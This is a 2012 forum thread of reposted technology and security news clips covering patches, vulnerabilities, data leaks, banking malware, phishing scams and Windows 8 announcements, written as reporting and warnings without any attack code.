"Duqu is no longer able to exploit that vulnerability after applying the security update. However, we wanted to be sure to address the vulnerable code wherever it appeared across the Microsoft code base," blogged Jonathan Ness from Microsoft's security research center engineering team.

"To that end, we have been working with Microsoft Research to develop a 'Cloned Code Detection' system that we can run for every MSRC case to find any instance of the vulnerable code in any shipping product."

Microsoft's second highest priority if a critical flaw in Word that allows remote code execution from malware accessed via email and websites. One exploit is in the wild but doesn't give admin access, and Office 2010 users don't need to fix this. ®

http://www.theregister.co.uk/2012/05/09/microsoft_...

--
Was this reply relevant?
+0
-0
mogs CClip 57
Expert Contributor 9th May, 2012 08:26
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Twitter says many leaked passwords inaccurate, duplicates
Many accounts were used for spamming and have been suspended, Twitter said

By Jeremy Kirk
May 8, 2012 08:14 PM
IDG News Service - Many of the Twitter logins and passwords leaked on the web this week are either inaccurate or belong to accounts already suspended for spamming, the company said late Tuesday.

The logins and passwords were published Monday on Pastebin, a website intended for programmers to share code but favored by hackers to release stolen data. The data was published on five separate posts on Pastebin, comprising a total of 58,978 login and password combinations.

"We've discovered that the list of alleged accounts and passwords found on Pastebin consists of more than 20,000 duplicates, many spam accounts that have already been suspended and many login credentials that do not appear to be linked," Twitter said via email. "The password and username are not actually associated with each other."

More at :-
http://www.computerworld.com/s/article/9226997/Twi...

--
Was this reply relevant?
+0
-0
mogs CClip 58
Expert Contributor 9th May, 2012 20:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
PHP patches actively exploited CGI vulnerability
PHP 5.4.3 and PHP 5.3.13 include fix for PHP CGI vulnerability that is being actively exploited to compromise websites

By Lucian Constantin
May 9, 2012 08:44 AM
IDG News Service - The PHP Group has released PHP 5.4.3 and PHP 5.3.13 on Tuesday in order to address two remote code execution vulnerabilities, one of which is being actively exploited by hackers.

"The releases complete a fix for a vulnerability in CGI-based setups (CVE-2012-2311)," the PHP developers said in the release notes. Additionally, PHP 5.4.3 fixes a buffer overflow vulnerability, identified as CVE-2012-2329, in the apache_request_headers() function.

The CVE-2012-2311 vulnerability, also known as CVE-2012-1823, was publicly disclosed last week and prompted the PHP Group to release PHP 5.3.12 and PHP 5.4.2 as emergency security updates in order to resolve it, on May 3.

Unfortunately, the initial patch proved to be ineffective against all variations of the exploit for CVE-2012-1823, and the manual workaround suggested by the PHP developers when releasing the emergency updates was easy to bypass as well.

The PHP developers investigated the issue further and published a new workaround on Sunday. They also promised to have a new working patch ready on Tuesday.

More at :-
http://www.computerworld.com/s/article/9227012/PHP...

--
Was this reply relevant?
+0
-0
mogs CClip 59
Expert Contributor 9th May, 2012 20:50
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
ICANN targets May 22 to resume name expansion
May 9, 2012
(AP) -- The organization behind a major expansion of Internet address suffixes hopes to resume taking proposals on May 22 following a technical glitch that shut down its computer system for weeks.
Last month, the Internet Corporation for Assigned Names and Numbers abruptly shut down a system for letting companies and organizations propose new suffixes, after it discovered a software glitch that exposed some private data. The data in some cases offered clues about which companies were proposing what suffixes, which was supposed to be confidential. ICANN says it has no evidence that anyone intentionally viewed the data.
If it can accept proposals again, the application window will run until May 30.
Up to 1,000 domain name suffixes - the ".com" part of an Internet address - could be added each year.

http://phys.org/news/2012-05-icann-resume-expansio...

--
Was this reply relevant?
+0
-0
mogs CClip 60
Expert Contributor 9th May, 2012 20:59
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
The Queen Confirms Internet Monitoring Law During Speech (Video) During her speech in front of the United Kingdom’s Parliament, the Queen confirmed that the government intends on introducing the controversial legislation that would allow law enforcement and intelligence agencies to monitor the Internet and other types of communications.

“My Government intends to bring forward measures to maintain the ability of the law enforcement and intelligence agencies to access vital communications data under strict safeguards to protect the public, subject to scrutiny of draft clauses,” the Queen said.

Those who oppose the dreaded law are upset with the fact that the technical details are kept secret.

“The Home Office have been very good at saying what the problem is, but seem intent on keeping the technical details of what they are proposing secret. Is it any wonder that the public are scared by a proposal for online surveillance not seen in any other Western democracy,” Nick Pickles of the Big Brother Watch organization wrote after the speech.

“They also seem keen to avoid talking about the Black Boxes for real time monitoring capability that we still believe to be part of the plan,” he added.

For now we can only speculate about the effects of such a law, but, most likely, UK authorities will try to sweeten the deal and say that everything is being done to protect individuals and not to violate their rights, or to censor them.

When the Home Office mentioned the law last month, its representatives argued that it’s necessary for the police to be able to access communications while investigating serious crimes or terrorism.

It remains to be seen how hacktivists react to this news. So far they’ve only targeted the sites of the Home Office and the one of the Government Communications Headquarters (GCHQ), but now that the plan is clear, protest can be expected to escalate significantly.

The complete speech can be viewed in the video provided by the UK Parliament:

http://news.softpedia.com/news/The-Queen-Confirms-...

--
Was this reply relevant?
+0
-0
mogs CClip 61
Expert Contributor 9th May, 2012 21:06
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Download OpenOffice 3.4 Stable
Apache Software Foundation just released the stable version for OpenOffice 3.4.0, which now goes under the name of Apache OpenOffice. It touts improved support for ODF, better graphics and performance improvements, which include a faster startup.

The new version of the suite supports the new ODF 1.2 encryption options and new spreadsheet functions. Documents encrypted with AES256 algorithm are now recognized and decrypted when the correct password is provided.

As far as graphics is concerned, the improvements refer to line caps, shear transformations and native support for Scalable Vector Graphics (SVG).

Chart viewing is better in the latest revision as it is driven by a new mechanism that increases speed, reduces memory usage and improves chart visualization in all visualizations, including PDF export and printing.

There is also a new regular expressions engine (ICU), which provides better standards compliance especially regarding Unicode, eliminates bugs in "Find and Replace" and speeds up the search process.

There is a full list of changes available on this page. Download Apache OpenOffice.

http://news.softpedia.com/news/Download-OpenOffice...

--
Was this reply relevant?
+0
-0
mogs CClip 62
Expert Contributor 10th May, 2012 07:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Wednesday, May 9, 2012 | 18:26
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.46 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 63
Expert Contributor 10th May, 2012 07:27
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Anonymous takes the Kremlin offline in Putin protest

Hacktivist group reacts as former president sweeps back to power
By Phil Muncaster • Get more from this author

Posted in Security, 10th May 2012 02:58 GMT
Hacktivist group Anonymous has been up to its old tricks again, this time briefly taking out the web site of the Russian president as a show of support for the growing opposition to newly re-crowned leader Vladimr Putin.

Like most of the group's DDoS campaigns, the attack only temporarily disrupted the kremlin.ru site, which is back online now, according to reports.

More at :
http://www.theregister.co.uk/2012/05/10/anonymous_...

--
Was this reply relevant?
+0
-0
mogs CClip 64
Expert Contributor 10th May, 2012 21:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Apple patches Safari, blocks outdated Flash Player
Yanks Flash plug-ins older than November 2010 version from browser

By Gregg Keizer
May 9, 2012 10:09 PM
Computerworld - Apple on Wednesday patched four security vulnerabilities in Safari and blocked outdated versions of Adobe's Flash Player from running in its browser.

The Flash blocking move was similar to one Apple made last month when it stopped the Java plug-in from launching automatically.

Safari 5.1.7, which runs on OS X 10.6 and 10.7 -- Snow Leopard and Lion, respectively -- as well as on Windows XP, Vista and Windows 7, was released alongside another update for Lion that included a slightly-older version of the browser. Lion users must download and install both updates to push Safari to version 5.1.7.

The four security flaws fixed were the same ones patched Tuesday in iOS 5.1.1 for the iPhone, iPad and iPod Touch. All were labeled as bugs in WebKit, the open-source rendering engine that powers Safari as well as Google's Chrome.

More at :-
http://www.computerworld.com/s/article/9227038/App...

--
Was this reply relevant?
+0
-0
mogs CClip 65
Expert Contributor 11th May, 2012 09:17
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft touts Windows 8's ability to detect, fix hard disk problems
The new operating system makes the process faster and less disruptive to the operation of the computer

By Juan Carlos Perez
May 10, 2012 04:46 PM ET
IDG News Service - Microsoft has revamped the way Windows 8 monitors hard disk operations and detects problems in an effort to make the diagnostic and repair process less intrusive and disruptive, even as disk capacity continues to balloon.

The improvements in Windows 8 center on the ChkDsk utility, which inspects the hard disk and checks for a variety of errors and problems. Until now, running ChkDsk has often been inconvenient because end users have to stop using the machine while the utility runs, and the scan can take a long time to complete.

Microsoft also tweaked NTFS, the Windows OS file system. Until now, the NTFS "health model" conceived the machine's hard disk as a single unit that was either well or damaged, and which thus was taken completely offline and made unavailable to the end user while ChkDsk ran, sometimes for hours.

"Downtime was directly proportional to the number of files in the volume," reads Microsoft's blog post late Wednesday authored by Kiran Bangalore , senior program manager of Windows Core Storage and File Systems.

In Windows 8, however, the NTFS scans for problems in the background while the system remains online, and an initial attempt to fix problems on-the-fly is done.

More at :-
http://www.computerworld.com/s/article/9227070/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 66
Expert Contributor 11th May, 2012 09:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Trusteer Warns of New Financial Malware Variant

While the new version of the Tatanga malware is currently focused on Spanish banking customers, it may be spreading to other countries.

By Jeff Goldman

Trusteer researchers are warning of a new version of the Tatanga financial malware, which was first uncovered in May of last year.

"In the configuration file we captured, Tatanga notifies the online banking victim via a web browser injection that their bank is offering free insurance protection against online fraud," writes Trusteer's Ayelet Heyman. "The victim is then presented with a fake insurance account that claims to cover the total amount of funds in their bank account. This fake insurance account is actually a real bank account that belongs to a money mule. The victim is told that they will be protected against any losses from online fraud by this insurance coverage. In the final step, the victim is prompted to authorize a transaction that they believe is to activate the insurance coverage."

"In order to do this, they need to input the transaction authorization code sent by their bank to their mobile phone number," writes PCWorld's Lucian Constantin. "This code allows the malware to finalize the rogue transfer in the background and send the victim's money to the money mule ... The maximum sum that is transferred by the malware in a single transaction is €5,000 or about US $6,500."

"Oren Kedem, director of product marketing for Trusteer, says the new configuration of Tatanga, discovered last week, was initially aimed at customers of a specific bank in Spain, but he says the authors of it may be trying to spread it to customers of other banks," writes CIO.com's Taylor Armerding.

"Trusteer’s latest discovery is another indication that the cybercrime ecosystem isn’t short on creative and new techniques to optimize hosts that are already infected with malware," writes ZDNet's Dancho Danchev.

http://www.esecurityplanet.com/malware/trusteer-wa...

--
Was this reply relevant?
+0
-0
mogs CClip 67
Expert Contributor 11th May, 2012 09:26
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe Patches Security Flaws ... For a Price

The upgrades that patch the vulnerabilities cost as much as $249.

By Jeff Goldman

Adobe today released updates for Photoshop, Illustrator, Flash Professional and Shockwave Player.

"The highest-priority vulnerabilities among those patched Tuesday is a group of five flaws in Shockwave that can be used to run malicious code on vulnerable machines," writes Threatpost's Dennis Fisher. "The update applies to both Windows and Mac machines and Adobe is recommending that users upgrade to version 11.6.5.635. The Shockwave bugs are rated as a priority 2."

"Windows users can tell if they have Shockwave installed by checking for an entry for the program in the Add/Remove Programs listing from the Windows Control Panel," writes Krebs on Security's Brian Krebs. "If you don’t already have this program, I’d recommend keeping it that way. I seem to have gotten along fine without it for several years now, and going without it just means one less buggy application to patch."

The H Security reports that all of the updates, aside from the one for Shockwave, will cost a significant amount of money to install. "It costs $199 to upgrade from a previous version to Photoshop CS6 alone, and this update is recommended by Adobe because it fixes several critical security holes," the article states. "The other upgrades, for Illustrator and Flash Professional, which close security holes are also exclusively available to paying customers."

If you don't want to pay for the upgrades ($249 for Illustrator and $99 for Flash Professional), Adobe's security bulletins simply advise that you "follow security best practices and exercise caution when opening files from unknown or untrusted sources."

In other words, good luck.

http://www.esecurityplanet.com/patches/adobe-patch...

--
Was this reply relevant?
+0
-0
mogs CClip 68
Expert Contributor 11th May, 2012 09:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
May 10th, 2012, 12:07 GMT · By Eduard Kovacs
Shady Windows Technicians Use LogMeIn to Take Control of Devices

Scams in which an alleged Windows technician calls to say that your computer is sending error messages to them are not new, but it seems they will never get old. Norman experts reveal that in some cases the scammers will call even 5 times a day trying to convince their victims to purchase so-called cleaning/repair products.

The name of the department in which the crooks pretend to work changes from one situation to the other, but in most cases it has something to do with Microsoft or Windows.

“Windows Technical Care Department”, “Windows Service Department”, and “Windows-certified support agent” are just some of the variants used in these plots.

Of course, tech-savvy users are well aware that Microsoft never calls its customers out of the blue, and neither do security solutions providers. That’s why when you receive a call from someone who tells you to access a certain site and download a piece of software, you can be certain that you have become the target of scam artists.

In recent instances, victims have been asked to install the LogMeIn application to give the crooks an easy access to the device. LogMeIn is certainly not a malicious program, but combined with social engineering, it can turn into a dangerous tool.

More at :-
http://news.softpedia.com/news/Shady-Windows-Techn...

--
Was this reply relevant?
+0
-0
mogs CClip 69
Expert Contributor 11th May, 2012 22:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft preps Windows 8 upgrade deal for early June debut, says report
Even with the offer, summer sales expected to remain 'lousy,' says analyst

By Gregg Keizer
May 11, 2012 12:52 PM ET
Computerworld - Microsoft will kick off a Windows 8 upgrade program for buyers of Windows 7 PCs in early June, according to a report.

But unlike past deals, this one may come with a price tag.

The program will, said CNET yesterday, provide a discounted upgrade to Windows 8 to anyone who purchases a new Windows 7-powered PC between June 2012 and January 2013.

Citing unnamed sources, CNET said that the upgrade offer would let buyers of Windows 7 systems purchase Windows 8 Pro -- the highest-priced edition that will be sold at retail -- for an undisclosed price.

The offer will debut at the same time that Microsoft launches Windows 8 Release Preview, which the company has pegged to the first week of June. The most likely date is June 5, assuming Microsoft follows the same schedule it used in 2009 to deliver Windows 7's release candidate.

More at :-
http://www.computerworld.com/s/article/9227092/Mic...

--
Was this reply relevant?
+0
-0
mogs CClip 70
Expert Contributor 11th May, 2012 22:10
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Amnesty International UK website compromised
Malicious code on Amnesty International website exploited a Java vulnerability to install Gh0st RAT on computers

By Lucian Constantin
May 11, 2012 11:41 AM ET
IDG News Service - The U.K. website of Amnesty International, a human rights watchdog organization, was compromised by hackers, who used it to infect visitors with a remote access Trojan horse program known as Gh0st RAT, security firm Websense reported on Friday.

Websense's automated malware scanners detected the compromise on the Amnesty site on Tuesday and Wednesday, Websense security researcher Gianluca Giuliani, said in a blog post on Friday. The attackers managed to inject malicious code that attempted to exploit a Java vulnerability known as CVE-2012-0507 into the site's homepage, he said.

The same vulnerability was exploited earlier this year to infect more than 600,000 Mac computers with the Flashback malware. It was patched in Java for Windows back in February and in Java for Mac in April.

The exploit code used in this attack appears to have been copied from Metasploit, an open source penetration testing framework popular among security professionals, Giuliani said.

More at :-
http://www.computerworld.com/s/article/9227091/Amn...

--
Was this reply relevant?
+0
-0
mogs CClip 71
Expert Contributor 11th May, 2012 22:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
FBI: Updates Over Public ‘Net Access = Bad Idea

The Federal Bureau of Investigation is advising travelers to avoid updating software while using hotel or other public Internet connections, warning that malicious actors are targeting travelers abroad through pop-up windows while they are establishing an Internet connection in their hotel rooms.

From the FBI’s advisory:

“Recently, there have been instances of travelers’ laptops being infected with malicious software while using hotel Internet connections. In these instances, the traveler was attempting to set up the hotel room Internet connection and was presented with a pop-up window notifying the user to update a widely used software product. If the user clicked to accept and install the update, malicious software was installed on the laptop. The pop-up window appeared to be offering a routine update to a legitimate software product for which updates are frequently available.”

Read more at :-
http://krebsonsecurity.com/category/latest-warning...

--
Was this reply relevant?
+0
-0
mogs CClip 72
Expert Contributor 11th May, 2012 22:25
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
- Strengthens protection against XSS vulnerabilities
NoScript extension for Firefox keeps improving by adding security against new exploitation methods. Besides fixing up two issues, build 2.4.1 also integrates protection against two new XSS vulnerabilities.

It can now keep you safe against exploitation of classic MS ASP's coalescing of same-name query parameters. On the same note, it features Protection against URL injections in window.name. Also added in this build is the type check exception to the lesscss Google Code file repository, which is often used as a CDN.

As far as mending goes, NoScript 2.4.1 fixes case-sensitivity bug in detection of unicode escape sequences and the "Allow sites open through bookmarks" regression.

The current stable version was preceded by three release candidates, each solving its share of issues.

The entire list of changes for this update is available on this page. Download NoScript extension for Firefox

http://news.softpedia.com/news/Download-NoScript-2...

--
Was this reply relevant?
+0
-0
mogs CClip 73
Expert Contributor 12th May, 2012 05:02
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Friday, May 11, 2012 | 14:00
Labels: Dev updates
The Dev channel has been updated to 20.0.1132.3 for Windows, Mac, Linux, and Chrome Frame. This build contains update for several fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 74
Expert Contributor 12th May, 2012 05:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Internet safe spot planned at ".secure" domain
May 11, 2012 by Glenn Chapman
Internet security specialists have applied for a ".secure" domain that they plan to turn into an online safe zone where bad guys aren't allowed.
San Francisco-based Artemis was awaiting word Friday from the Internet Corporation for Assigned Names and Numbers (ICANN) on whether it was approved to host websites with ".secure" addresses.
"We are creating a safe neighborhood where you know people follow the rules and you can rely on them to do things securely," Artemis chief technical officer Alex Stamos told AFP.
"There is not going to be typo squatting or malware... We are going to make it really air tight so even if you were in Syria the Syrian government couldn't hijack you."
Commonly available, but typically unused, technology tools for thwarting online hackers, viruses, snoops, spies and scammers will be mandatory at websites with .secure addresses.
"The idea is to make it effortlessly secure for individuals," Stamos said.
"In the end, the actual technical security tactics are things (websites) should be doing anyway. We are just making it a requirement."
Plans for .secure were part of an Internet domain name "revolution" that remained on hold due to a flaw that let some aspiring applicants peek at unauthorized information at the ICANN registration website.
ICANN intends to resume taking applications on May 22 from those interested in running new generic top-level domains (gTLDs) online, with the window staying open for about five days.

Read more at :-
http://phys.org/news/2012-05-internet-safe-domain....

--
Was this reply relevant?
+0
-0
mogs CClip 75
Expert Contributor 12th May, 2012 05:22
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Get a detailed diagnostic report on your computer with HijackThis
This free tool will report on Windows Registry and file settings on your PC
Tim Smith Download review Problem solving 11/05/2012
Get a detailed report on changes made to your computer using HijackThis

Fixing the changes made by malicious software can be a tricky business, but initially you have to discover exactly what was changed in the first place. HijackThis is a helpful tool that will create a report of suspicious changes and can be used to reverse them.
There is no installation. Just run the downloaded file to get started.
The main menu shows all of the different tools in HijackThis. The first option is to run a system scan and save the results in a text file. The option below just runs the scan but there isn't much point in not saving the results.
The scan doesn't take long, even on a computer that has seen a lot of changes such as our test machine. All the changes made to the Registry and settings are shown with a simple code identifying the type of change.
Changes can range from a new home page for Internet Explorer or search engines in other browsers. A full list of the codes and their meanings can be found by clicking on the Info button.
More details about changes can be found by clicking on them and then the Info on selected item button.
The Analyze This button takes you to the HijackThis forum hosted by TrendMicro to share the results of the scan and to look for advice. A HijackThis report is often requested on our own forums.
HijackThis can be used to reverse the changes it finds. Select items using the check boxes and click on the Fix checked button. We would echo the warnings in HijackThis that you should only do this if you know exactly what the change will do.
While the results may not make a lot of sense when they first appear, this is a valuable tool for getting help with computer problems as it gives the experts the information they need.


Read more: http://www.computeractive.co.uk/ca/download-review...


--
Was this reply relevant?
+0
-0
mogs CClip 76
Expert Contributor 12th May, 2012 10:18
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Viewpoint: Preparing for the digital defence of the realm
By Simon McCalla
Director of IT, Nominet The notion of a co-ordinated cyberthreat has moved from the abstract to being all too real for many of us in the last few years.

From a theoretical risk to a tangible reality, the attacks by Anonymous on a variety of UK internet sites including the UK government, breaches of global giants like Sony and the debate that surrounded the digital discussion during the London riots truly transformed cybersecurity from a topic that was the province of technologists to a down-the-pub discussion that affects the everyday citizen.

The UK government is pledging hundreds of millions of pounds to defend the realm from cyber-attacks, but they are just one player in an inter-connected web of stakeholders looking to keep the internet in the UK safe, secure, trusted and contributing to Britain's economic growth and recovery.

It's not all about the spooks, digital or otherwise, and we need to be ready.

Read more at :-
http://www.bbc.co.uk/news/technology-18032278

--
Was this reply relevant?
+0
-0
mogs CClip 77
Expert Contributor 12th May, 2012 22:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

“Diablo 3 Free Download” Scams Fill the Pockets of Cybercriminals
Cybercriminals are online fraudsters are well aware of the fact that many users will want to download Diablo III, the latest version of the famous RPG game. That is why they are trying to lure unsuspecting gamers to their malicious sites with “Diablo 3 free download” offers.

In fact, as Trend Micro security experts warn, many of the Google results that appear after searching for “diablo 3 free download” actually point to shady sites.

Users who fall for these traps and click on the result links are taken to sites that displays a big “Download Now” button. Once pressed, another website appears, requesting the user to complete an “offer” to gain access to the highly desired content.

These offers, better known as the classic affiliate survey scams, include topics such as “Discover your fortune”, “iWinners”, or something for the Spanish speakers which reads, “Recibe la major musica, videos e imagines directamente a tu movil.”

Each time someone completes one of these surveys, the crooks earn a certain amount of money from shady online marketing companies.

In another scenario, the potential victim is taken to website that’s promoted as a YouTube page. Here, he/she is presented with instructions that must be followed in order to download the beta version of Diablo III for free.

As in many similar cases, Facebook is involved. The scheme must be shared, Liked, and posted on three different pages of the social media website.

Only after these steps are completed the fun begins. Users are asked to answer a number of questions as part of a survey to unlock the content.

Of course, Diablo III is not the first game that’s used in malicious schemes, Grand Theft Auto and World of Warcraft being just a few of the many examples.

Gamers are advised to purchase the game only from trusted sources. Also it’s recommended that they stay away from “Diablo 3 free download” links.

http://news.softpedia.com/news/Diablo-3-Free-Downl...

--
Was this reply relevant?
+0
-0
mogs CClip 78
Expert Contributor 12th May, 2012 22:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Bitcoinica Taken Offline, More Than 18,000 Bitcoins Stolen Bitcoinica has been taken offline by its administrators after they’ve noticed a suspicious transaction. It’s believed that at least 18,000 BTC ($90,000 or 68,000 EUR) have been stolen.

“Today, we have discovered a suspicious Bitcoin transaction that doesn't seem to be initiated by any one of the company owners. Some of them are not online at the moment so this is not conclusive,” Bitcoinica representatives wrote.

“We have contacted Rackspaceto suspend all our servers and lock down our accounts. All your trading and financial data is safe (as far as I know), apart from the Bitcoin loss.
Thank you for your patience and understanding while we investigate this issue in detail.”

Many criticized the site’s owners for keeping such amounts of currency on hosted systems instead of using offline transactions and disconnecting the wallets from the trading infrastructure, especially after the Linode incident.

However, Bitcoin representatives responded that 80% of the Bitcoins are in fact in offline wallets, but the large number of withdrawals forces them to keep a large balance accessible.

In a later post on the BitcoinTalk forum, a Bitcoinica employee revealed that the problem is far more serious than initially believed. They estimate that the entire platform will be shut down or even re-developed, operation which may take months.

It appears that the incident may have been a result of a compromised email server that belongs to one of the teams.

In the meantime, until they get everything back and running, they advised users not to reuse their passwords, but also to be on the lookout for phishing emails that may leverage this unfortunate event.

The incident comes after a few days ago the FBI released a report in which it detailed the fact that Bitcoins represent a great currency for cybercriminals who want their illegal activities to go by unnoticed.

http://news.softpedia.com/news/Bitcoinica-Taken-Of...

--
Was this reply relevant?
+0
-0
mogs CClip 79
Expert Contributor 12th May, 2012 22:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft Prepares New Antimalware Engine Release for May 15th, 2012 On May 15th, 2012, Microsoft will release a new Antimalware Engine to address security threats out there. The new release is part of the regular antimalware technology updates that Microsoft is pushing out each month.

According to the Redmond-based software giant, the upcoming Antimalware Engine iteration will affect products such as Microsoft Security Essentials, Forefront Client Security, Forefront Endpoint Protection, Windows Intune Endpoint Protection.

Additionally, the company notes that the new Engine will come out of its laboratories with a version in the range of 1.1.840X.0. Additional details on the matter are expected to be pushed out along with the official release.

Last month, the software behemoth made available for download Antimalware Engine version 1.1.8304.0. The release was delivered to all of the affected Microsoft customers starting April 18th.

http://news.softpedia.com/news/Microsoft-Prepares-...

--
Was this reply relevant?
+0
-0
mogs CClip 80
Expert Contributor 13th May, 2012 12:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe backpedals, will now patch software for free
Changes tune after customers, security pros condemned Adobe's advice to spend hundreds on upgrades to get fixes

By Gregg Keizer
May 12, 2012 06:47 PM ET
Computerworld - After being pummeled by customers and security experts for telling users to spend hundreds of dollars on upgrades because it wasn't going to patch critical bugs in older versions of its software, Adobe has reversed course.

The company will now fix the eight vulnerabilities in the one-year-old Illustrator and Flash Professional CS5.5, and the two-year-old Photoshop CS5, an Adobe spokeswoman said via email late Friday.

There will be no charge for the updates.

A post by Adobe's product security response team to its official blog spelled out the change.

Read more at :-
http://www.computerworld.com/s/article/9227119/Ado...

--
Was this reply relevant?
+0
-0
mogs CClip 81
Expert Contributor 14th May, 2012 08:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Senate to look at Mozilla's browser competition allegations
Sen. Herb Kohl's office to examine Mozilla's complaint against Microsoft over browser API access in Windows RT

By Gregg Keizer
May 13, 2012 03:30 PM ET1 Comment. What's this?
Computerworld - The U.S. Senate Judiciary Committee will look into accusations by Mozilla that Microsoft is restricting access to important programming tools for browsers that will run in Windows RT, a political blog reported Friday.

The Hill cited unnamed aides to Sen. Herb Kohl (D-Wis.), the chairman of the Subcommittee on Antitrust, Competition Policy, and Consumer Rights, as the source for its report.

Last week, Mozilla, the maker of Firefox, said Microsoft was withholding access to APIs -- application programming interfaces -- that Mozilla considers crucial for building a browser that can compete with Microsoft's own Internet Explorer 10 (IE10) on ARM devices.

More at :-
http://www.computerworld.com/s/article/9227121/Sen...

--
Was this reply relevant?
+0
-0
mogs CClip 82
Expert Contributor 14th May, 2012 21:06
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe changes course and patches Photoshop for free
Adobe has apparently changed its mind about requiring customers to pay to get recent security patches for its Photoshop, Illustrator and Flash Professional products.

The patches cover vulnerabilities in Creative Suite 5 and earlier versions of the products that could let a remote intruder execute malicious code and take control of computers running the software. Adobe had originally said customers would need to pay to upgrade to the Creative Suite 6 versions to get the fixes.

"We are in the process of resolving the vulnerabilities...in Adobe Illustrator CS5.x, Adobe Photoshop CS5.x (12.x) and Adobe Flash Professional CS5.x, and will update the respective security bulletins once the patches are available," Adobe said in a post to its security blog on Friday.

More at :-
http://www.zdnet.co.uk/news/security-threats/2012/...

--
Was this reply relevant?
+0
-0
mogs CClip 83
Expert Contributor 14th May, 2012 21:11
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Phishers to Hotmail Users: Your Account Has Been Blocked

Hotmail customers are advised to be on the lookout for emails entitled “E-mail account alert!” which notify them that their accounts have been blocked. These messages hide a link which points to a malicious website that urges the potential victim to provide his login credentials.

Here’s part of the shady notification, provided by the folks from Hoax Slayer:

This e-mail has been sent to you by Hotmail to inform you that your account has been blocked.

Why are you seeing this? Someone may have used your account to send out a lot of junk messages (or something else that violates the Windows Live Terms of Service). We're here to help you get your account back. What do you need to do?

We'll ask you to login to our secured activation page by following the link below and re-activate your account.
[Link]

If you have already confirmed your account information then please disregard this message.

Users who fall for the scam and click on the shady link are taken to a website that almost perfectly replicates the genuine Windows Live login webpage. Once the username and password are provided, the unsuspecting victim is taken to the legitimate website.

More at :-
http://news.softpedia.com/news/Phishers-to-Hotmail...

--
Was this reply relevant?
+0
-0
mogs CClip 84
Expert Contributor 14th May, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
MoD to warn of E-bomb attack
The UK needs to build its digital defences, defence secretary Philip Hammond will say

By Anh Nguyen | Computerworld UK | 14 May 12
The UK needs to defend itself against an electromagnetic pulse-based 'E-bomb' that could knock out all electronic systems, the defence secretary will say today.

Philip Hammond will tell a security conference in London that traditional defences based on "infantry or jet planes" would not be enough to protect the country from such an attack, and that Britain needs to spend money on building its digital defences.

"One of the challenges we face, particularly at a time of limited resources, is to make the case for spending on defence and security solutions that cannot readily be seen by the public - that cannot be shown off in the parade ground - that could be digital, not necessarily physical," Hammond is due to say, according to The Telegraph.

More at :-
http://www.pcadvisor.co.uk/news/security/3357548/m...

--
Was this reply relevant?
+0
-0
mogs CClip 85
Expert Contributor 15th May, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft to charge $15 for Windows 8 upgrade deal
Blogger pegs price for Windows 7 PC buyers during run-up to fall debut of new OS

By Gregg Keizer
May 15, 2012 11:30 AM ET
Computerworld - Microsoft will charge users who buy a new Windows 7 PC $14.99 for an upgrade to Windows 8, according to a report.

The cost of the upgrade was revealed yesterday by Paul Thurrott, a popular blogger who writes SuperSite for Windows.

An earlier report by CNET had claimed that Microsoft would charge a fee for the upgrade, but had not spelled out the amount. CNET said that the program would kick off alongside the delivery of Windows 8 Release Preview.

Microsoft has said it will ship the preview the first week of June. If the company follows the same schedule it used in 2009 to deliver Windows 7's release candidate, the most likely date is Tuesday, June 5.

More at :-
http://www.computerworld.com/s/article/9227169/Mic...

--
Was this reply relevant?
+0
